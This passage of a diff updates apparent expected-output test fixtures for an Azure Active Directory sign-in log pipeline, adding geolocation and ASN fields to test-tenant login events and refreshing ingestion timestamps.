"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -362,6 +398,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -442,7 +490,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970091700Z", + "ingested": "2021-12-14T14:49:08.047397954Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -482,6 +530,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -562,7 +622,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970097400Z", + "ingested": "2021-12-14T14:49:08.047398722Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -602,6 +662,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -682,7 +754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970103200Z", + "ingested": "2021-12-14T14:49:08.047399334Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -722,6 +794,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -802,7 +886,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970108800Z", + "ingested": "2021-12-14T14:49:08.047399928Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -842,6 +926,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -922,7 +1018,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970114500Z", + "ingested": "2021-12-14T14:49:08.047400460Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -962,6 +1058,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -1042,7 +1150,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970120100Z", + "ingested": "2021-12-14T14:49:08.047401083Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1082,6 +1190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1162,7 +1282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970123900Z", + "ingested": "2021-12-14T14:49:08.047401720Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1202,6 +1322,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -1282,7 +1414,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970128600Z", + "ingested": "2021-12-14T14:49:08.047402301Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1322,6 +1454,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1402,7 +1546,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970133400Z", + "ingested": "2021-12-14T14:49:08.047402932Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1442,6 +1586,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1522,7 +1678,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970138300Z", + "ingested": "2021-12-14T14:49:08.047403447Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1562,6 +1718,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1642,7 +1810,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970142Z", + "ingested": "2021-12-14T14:49:08.047404110Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1682,6 +1850,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ @@ -1762,7 +1942,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970146600Z", + "ingested": "2021-12-14T14:49:08.047404738Z", "original": 